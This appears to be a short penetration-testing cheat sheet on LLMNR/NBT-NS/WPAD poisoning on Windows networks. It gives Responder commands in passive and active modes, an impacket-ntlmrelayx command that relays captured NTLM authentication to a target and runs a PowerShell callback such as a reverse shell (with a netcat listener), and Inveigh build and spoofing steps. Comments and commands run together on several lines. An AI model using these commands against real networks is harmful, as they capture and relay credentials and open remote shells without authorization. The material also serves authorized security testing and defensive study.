Observe NBT-NS, BROWSER, LLMNR, etc. No responses sent – only capture broadcast traffic; no login prompts or relay.
sudo responder -I <INTERFACE> -A
Active (respond / relay)
Sends responses or relays auth: can trigger login prompts or relay hashes to a target
# Force WPAD; may cause a login promptsudo responder --wpad --ForceWpadAuth --verbose --interface=<INTERFACE>
# Relay NTLM to target and execute a callback (e.g. rev shell)# nc -lvnp <PORT>impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET> -c '<POWERSHELL_CALLBACK>'
Inveigh
Windows-capable LLMNR/NBNS/mDNS/DNS spoofer and capture tool (NTLM, etc.); use the C# build (Inveigh.exe) – the PowerShell version is legacy and unmaintained.
# Or build from repo (C#): open Inveigh.sln, build/publish for win-x64, or:# dotnet publish -r win-x64 -c Release -p:PublishSingleFile=true# Run with LLMNR + NBNS spoofing, full console output, and file output (all explicit).\Inveigh.exe -LLMNR Y -NBNS Y -Console 5 -FileOutput Y